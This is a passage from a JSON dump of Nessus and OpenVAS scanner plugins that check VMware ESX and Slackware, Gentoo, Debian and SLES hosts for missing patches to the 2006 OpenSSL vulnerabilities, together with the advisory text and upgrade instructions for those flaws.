3.0.3\",\n patch : \"ESX303-200808402-SG\",\n patch_updates : make_list(\"ESX303-Rollup01\", \"ESX303-Update01\")\n )\n) flag++;\n\nif (\n esx_check(\n ver : \"ESX 3.5.0\",\n patch : \"ESX350-200808405-SG\",\n patch_updates : make_list(\"ESX350-201002401-SG\", \"ESX350-Update04\", \"ESX350-Update05\", \"ESX350-Update05a\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 3.5.0\",\n patch : \"ESX350-200808406-SG\",\n patch_updates : make_list(\"ESX350-201008412-SG\", \"ESX350-Update04\", \"ESX350-Update05\", \"ESX350-Update05a\")\n )\n) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:esx_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-24T12:50:56", "description": "The remote host is missing an update as announced\nvia advisory SSA:2006-272-01.", "cvss3": {}, "published": "2012-09-11T00:00:00", "type": "openvas", "title": "Slackware Advisory SSA:2006-272-01 openssl", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:57491", "href": "http://plugins.openvas.org/nasl.php?oid=57491", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2006_272_01.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New openssl packages are available for Slackware 9.0, 9.1, 10.0, 10.1,\n10.2, and -current to fix security issues.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2006-272-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2006-272-01\";\n \nif(description)\n{\n script_id(57491);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-3738\", \"CVE-2006-2940\", \"CVE-2006-4343\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2006-272-01 openssl \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"openssl-solibs\", ver:\"0.9.7l-i386-1_slack9.0\", rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"openssl\", ver:\"0.9.7l-i386-1_slack9.0\", rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"openssl-solibs\", ver:\"0.9.7l-i486-1_slack9.1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"openssl\", ver:\"0.9.7l-i486-1_slack9.1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"openssl-solibs\", ver:\"0.9.7l-i486-1_slack10.0\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"openssl\", ver:\"0.9.7l-i486-1_slack10.0\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"openssl-solibs\", ver:\"0.9.7l-i486-1_slack10.1\", rls:\"SLK10.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"openssl\", ver:\"0.9.7l-i486-1_slack10.1\", rls:\"SLK10.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"openssl-solibs\", ver:\"0.9.7l-i486-1_slack10.2\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"openssl\", ver:\"0.9.7l-i486-1_slack10.2\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:00", "description": "The remote host is missing updates announced in\nadvisory GLSA 200610-11.", "cvss3": {}, "published": "2008-09-24T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200610-11 (openssl)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:57909", "href": "http://plugins.openvas.org/nasl.php?oid=57909", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"OpenSSL contains multiple vulnerabilities including the possible remote\nexecution of arbitrary code.\";\ntag_solution = \"All OpenSSL 0.9.8 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-libs/openssl-0.9.8d'\n\nAll OpenSSL 0.9.7 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-libs/openssl-0.9.7l'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200610-11\nhttp://bugs.gentoo.org/show_bug.cgi?id=145510\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200610-11.\";\n\n \n\nif(description)\n{\n script_id(57909);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4343\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200610-11 (openssl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"dev-libs/openssl\", unaffected: make_list(\"ge 0.9.8d\", \"rge 0.9.7l\"), vulnerable: make_list(\"lt 0.9.8d\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:53", "description": "The remote host is missing an update to openssl\nannounced via advisory DSA 1185-1.\n\nMultiple vulnerabilities have been discovered in the OpenSSL\ncryptographic software package that could allow an attacker to launch\na denial of service attack by exhausting system resources or crashing\nprocesses on a victim's computer.\n\nCVE-2006-2937\nDr S N Henson of the OpenSSL core team and Open Network\nSecurity recently developed an ASN1 test suite for NISCC\n(www.niscc.gov.uk). When the test suite was run against\nOpenSSL two denial of service vulnerabilities were discovered.\n\nDuring the parsing of certain invalid ASN1 structures an error\ncondition is mishandled. This can result in an infinite loop\nwhich consumes system memory.\n\nAny code which uses OpenSSL to parse ASN1 data from untrusted\nsources is affected. This includes SSL servers which enable\nclient authentication and S/MIME applications.\n\nCVE-2006-3738\nTavis Ormandy and Will Drewry of the Google Security Team\ndiscovered a buffer overflow in SSL_get_shared_ciphers utility\nfunction, used by some applications such as exim and mysql. An\nattacker could send a list of ciphers that would overrun a\nbuffer.\n\nCVE-2006-4343\nTavis Ormandy and Will Drewry of the Google Security Team\ndiscovered a possible DoS in the sslv2 client code. Where a\nclient application uses OpenSSL to make a SSLv2 connection to\na malicious server that server could cause the client to\ncrash.\n\nCVE-2006-2940\nDr S N Henson of the OpenSSL core team and Open Network\nSecurity recently developed an ASN1 test suite for NISCC\n(www.niscc.gov.uk). When the test suite was run against\nOpenSSL a DoS was discovered.\n\nCertain types of public key can take disproportionate amounts\nof time to process. This could be used by an attacker in a\ndenial of service attack.", "cvss3": {}, "published": "2008-01-17T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 1185-1 (openssl)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:57478", "href": "http://plugins.openvas.org/nasl.php?oid=57478", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1185_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1185-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) these problems have been fixed in\nversion 0.9.7e-3sarge3.\n\nFor the unstable and testing distributions (sid and etch,\nrespectively), these problems will be fixed in version 0.9.7k-2 of the\nopenssl097 compatibility libraries, and version 0.9.8c-2 of the\nopenssl package.\n\nWe recommend that you upgrade your openssl package. Note that\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201185-1\";\ntag_summary = \"The remote host is missing an update to openssl\nannounced via advisory DSA 1185-1.\n\nMultiple vulnerabilities have been discovered in the OpenSSL\ncryptographic software package that could allow an attacker to launch\na denial of service attack by exhausting system resources or crashing\nprocesses on a victim's computer.\n\nCVE-2006-2937\nDr S N Henson of the OpenSSL core team and Open Network\nSecurity recently developed an ASN1 test suite for NISCC\n(www.niscc.gov.uk). When the test suite was run against\nOpenSSL two denial of service vulnerabilities were discovered.\n\nDuring the parsing of certain invalid ASN1 structures an error\ncondition is mishandled. This can result in an infinite loop\nwhich consumes system memory.\n\nAny code which uses OpenSSL to parse ASN1 data from untrusted\nsources is affected. This includes SSL servers which enable\nclient authentication and S/MIME applications.\n\nCVE-2006-3738\nTavis Ormandy and Will Drewry of the Google Security Team\ndiscovered a buffer overflow in SSL_get_shared_ciphers utility\nfunction, used by some applications such as exim and mysql. An\nattacker could send a list of ciphers that would overrun a\nbuffer.\n\nCVE-2006-4343\nTavis Ormandy and Will Drewry of the Google Security Team\ndiscovered a possible DoS in the sslv2 client code. Where a\nclient application uses OpenSSL to make a SSLv2 connection to\na malicious server that server could cause the client to\ncrash.\n\nCVE-2006-2940\nDr S N Henson of the OpenSSL core team and Open Network\nSecurity recently developed an ASN1 test suite for NISCC\n(www.niscc.gov.uk). When the test suite was run against\nOpenSSL a DoS was discovered.\n\nCertain types of public key can take disproportionate amounts\nof time to process. This could be used by an attacker in a\ndenial of service attack.\";\n\n\nif(description)\n{\n script_id(57478);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:13:11 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-2937\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1185-1 (openssl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"0.9.7e-3sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl0.9.7\", ver:\"0.9.7e-3sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssl\", ver:\"0.9.7e-3sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:56", "description": "The remote host is missing an update as announced\nvia advisory SSA:2006-272-01.", "cvss3": {}, "published": "2012-09-11T00:00:00", "type": "openvas", "title": "Slackware Advisory SSA:2006-272-01 openssl", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:136141256231057491", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231057491", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2006_272_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.57491\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-3738\", \"CVE-2006-2940\", \"CVE-2006-4343\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2006-272-01 openssl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(9\\.0|9\\.1|10\\.0|10\\.1|10\\.2)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2006-272-01\");\n\n script_tag(name:\"insight\", value:\"New openssl packages are available for Slackware 9.0, 9.1, 10.0, 10.1,\n10.2, and -current to fix security issues.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2006-272-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"openssl-solibs\", ver:\"0.9.7l-i386-1_slack9.0\", rls:\"SLK9.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"openssl\", ver:\"0.9.7l-i386-1_slack9.0\", rls:\"SLK9.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"openssl-solibs\", ver:\"0.9.7l-i486-1_slack9.1\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"openssl\", ver:\"0.9.7l-i486-1_slack9.1\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"openssl-solibs\", ver:\"0.9.7l-i486-1_slack10.0\", rls:\"SLK10.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"openssl\", ver:\"0.9.7l-i486-1_slack10.0\", rls:\"SLK10.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"openssl-solibs\", ver:\"0.9.7l-i486-1_slack10.1\", rls:\"SLK10.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"openssl\", ver:\"0.9.7l-i486-1_slack10.1\", rls:\"SLK10.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"openssl-solibs\", ver:\"0.9.7l-i486-1_slack10.2\", rls:\"SLK10.2\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"openssl\", ver:\"0.9.7l-i486-1_slack10.2\", rls:\"SLK10.2\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-26T08:55:11", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n openssl-devel\n openssl\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5018586 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-10T00:00:00", "type": "openvas", "title": "SLES9: Security update for OpenSSL", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:65603", "href": "http://plugins.openvas.org/nasl.php?oid=65603", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5018586.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for OpenSSL\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n openssl-devel\n openssl\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5018586 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65603);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4343\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for OpenSSL\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~0.9.7d~15.29\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:22", "description": "The remote host is missing updates announced in\nadvisory GLSA 200612-11.", "cvss3": {}, "published": "2008-09-24T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200612-11 (emul-linux-x86-baselibs)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:57950", "href": "http://plugins.openvas.org/nasl.php?oid=57950", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"OpenSSL contains multiple vulnerabilities including the possible execution\nof remote arbitrary code.\";\ntag_solution = \"All AMD64 x86 emulation base libraries users should upgrade to the latest\nversion:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose\n'>=app-emulation/emul-linux-x86-baselibs-2.5.5'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200612-11\nhttp://bugs.gentoo.org/show_bug.cgi?id=152640\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200612-11.\";\n\n \n\nif(description)\n{\n script_id(57950);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4343\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200612-11 (emul-linux-x86-baselibs)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"app-emulation/emul-linux-x86-baselibs\", unaffected: make_list(\"ge 2.5.5\"), vulnerable: make_list(\"lt 2.5.5\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:14", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n openssl-devel\n openssl\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5018586 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-10T00:00:00", "type": "openvas", "title": "SLES9: Security update for OpenSSL", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231065603", "href": 